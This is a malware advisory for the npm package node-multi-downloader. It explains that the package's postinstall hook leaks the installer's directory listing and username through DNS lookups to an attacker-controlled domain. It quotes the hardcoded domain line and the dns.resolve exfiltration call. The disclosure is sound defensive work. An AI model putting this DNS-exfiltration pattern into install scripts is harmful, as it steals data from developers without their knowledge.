VYPR
← All malware advisories

npm · Malicious package advisory

Malware

node-multi-downloader

MAL-2026-5735

Malicious code in node-multi-downloader (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (8fc720cd970f4d19212ca90945b7fc1e4e1c64da98235ff595b3792ae69e3e68)
On `npm install`, this package's postinstall hook (`node index.js`) hex-encodes the installer's current working directory, the first 15 entries of that directory, and `os.userInfo().username`, and leaks each chunk via DNS A-record lookups to subdomains of the attacker-controlled domain `uqlyosvp1f9.oob.evilsec.xyz`. The hardcoded out-of-band domain is bound at index.js line 1 (`const D = "uqlyosvp1f9.oob.evilsec.xyz"`) and index.js line 8 calls `dns.resolve(`${chunk}.${tag}${i}.${D}`, 'A',...)` to transmit the encoded data. DNS-subdomain encoding is a well-known technique to evade HTTP egress filtering. The package metadata (description "RSI package!", anonymous author, release-candidate version) provides no legitimate purpose that would justify reading installer filesystem and identity at install time.

Compromised versions (1)

  • 5.0.14-rc.3

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.